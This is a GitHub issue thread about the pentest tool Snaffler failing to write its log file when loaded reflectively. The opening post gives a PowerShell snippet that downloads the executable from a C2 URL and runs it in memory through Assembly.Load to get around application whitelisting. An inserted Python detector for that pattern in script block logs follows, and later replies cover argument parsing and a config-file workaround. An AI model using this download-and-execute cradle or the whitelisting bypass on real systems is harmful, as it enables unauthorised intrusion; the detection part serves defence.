Snaffler doesn't write log file when executed reflectively #26

Closed
byt3bl33d3r opened this issue Nov 13, 2020 · 4 comments

Comments

@byt3bl33d3r

Heya,

I'm on a gig where the client has whitelisting enabled but hasn't locked down PowerShell. So while I can't run the Snaffler executable directly, I can just run it reflectively through PowerShell:

$bytes = IEX (New-Object Net.WebClient).DownloadData("https://myc2url/snaffler.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$vars = New-Object System.Collections.Generic.List[System.Object]
$vars.Add("-s")
$vars.Add("-o")
$vars.Add("snaffler.log")
$passed = [string[]]$vars.ToArray()
$asm.EntryPoint.Invoke($null, @(,$passed))

Now Snaffler itself works perfectly like this, however for some reason the log file never gets written to disk (even though I did specify the -o snaffler.log argument).

The arguments seem to be parsed successfully because if I remove the -s option I don't get any console output.

Is this something you've tried and/or is it a limitation on the Snaffler logger?

Thanks
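
For defenders, the pattern in the post above (downloaded bytes passed to Assembly.Load, then EntryPoint.Invoke) is visible in PowerShell script block logging (event ID 4104). The following is an added example, not part of the original post or of Snaffler: a small Python check that tracks that data flow through a logged script block. The sample blocks, URL and file names are constructed, and the extra byte sources (FromBase64String, ReadAllBytes) go beyond what the post shows.

```python
import re

# Constructed sample: text of a PowerShell script block as it would appear in
# a 4104 script block logging event. URL and file names are placeholders.
SAMPLE_BLOCK = r'''
$bytes = (New-Object Net.WebClient).DownloadData("https://example.invalid/tool.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$passed = [string[]]@("-s", "-o", "out.log")
$asm.EntryPoint.Invoke($null, @(,$passed))
'''

# Constructed benign block: loads from a file path, never from a byte array.
BENIGN_BLOCK = r'''
$asm = [System.Reflection.Assembly]::LoadFrom("C:\Program Files\App\lib.dll")
$bytes = [System.IO.File]::ReadAllBytes("C:\temp\report.bin")
'''

ASSIGN = re.compile(r'^\s*\$(\w+)\s*=\s*(.+)$')            # $var = <rhs>
SOURCES = re.compile(r'\.downloaddata\(|frombase64string\(|readallbytes\(')
LOAD = re.compile(r'\[(?:system\.)?reflection\.assembly\]::load\(\s*\$(\w+)')
INVOKE = re.compile(r'\$(\w+)\.entrypoint\.invoke\(')

def normalize(line):
    # Backticks are PowerShell escape characters, often used to split keywords.
    return line.replace('`', '').lower()

def find_reflective_load(script_block):
    """Return findings where bytes from a tracked source reach Assembly.Load
    and the entry point of the loaded assembly is then invoked."""
    byte_vars, asm_vars, findings = set(), {}, []
    for lineno, raw in enumerate(script_block.splitlines(), 1):
        line = normalize(raw)
        m = ASSIGN.match(line)
        if m:
            name, rhs = m.groups()
            if SOURCES.search(rhs):
                byte_vars.add(name)           # variable now holds raw bytes
            load = LOAD.search(rhs)
            if load and load.group(1) in byte_vars:
                asm_vars[name] = lineno       # variable holds an in-memory assembly
        inv = INVOKE.search(line)
        if inv and inv.group(1) in asm_vars:
            findings.append({"load_line": asm_vars[inv.group(1)],
                             "invoke_line": lineno, "variable": inv.group(1)})
    return findings

if __name__ == "__main__":
    for f in find_reflective_load(SAMPLE_BLOCK):
        print("in-memory assembly load and entry-point invoke:", f)
```

The check only follows direct variable assignments within one script block, so it is a starting point for triage rather than a complete detection.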

@S3cur3Th1sSh1t

S3cur3Th1sSh1t commented Nov 14, 2020

I cannot tell if something changed from the output behaviour in the last commits, but this version works fine from PowerShell even with output:

https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Snaffler.ps1

@l0ss
Contributor

l0ss commented Nov 22, 2020

I haven't tried it myself but if I had to guess I'd say something is going squirrely in the way the -o argument is being parsed in your example.

You could test by doing like...

$vars.Add("-s")
$vars.Add("-i")
$vars.Add("C:\")

and see if it successfully understands to snaffle C:. If it doesn't, then I suppose you could try doing $vars.Add("-o snaffler.log")?

@l0ss
Contributor

l0ss commented Dec 14, 2020

Closed pending further updates - feel free to ping us again if you can do the above test.

@l0ss l0ss closed this as completed Dec 14, 2020
@ville87
Contributor

ville87 commented Jul 14, 2021

So I had the same issue in an engagement yesterday and the only way I was able to fix this was by first creating a TOML file and then running the tool via:
$vars.Add("-z")
$vars.Add("c:\temp\config.toml")
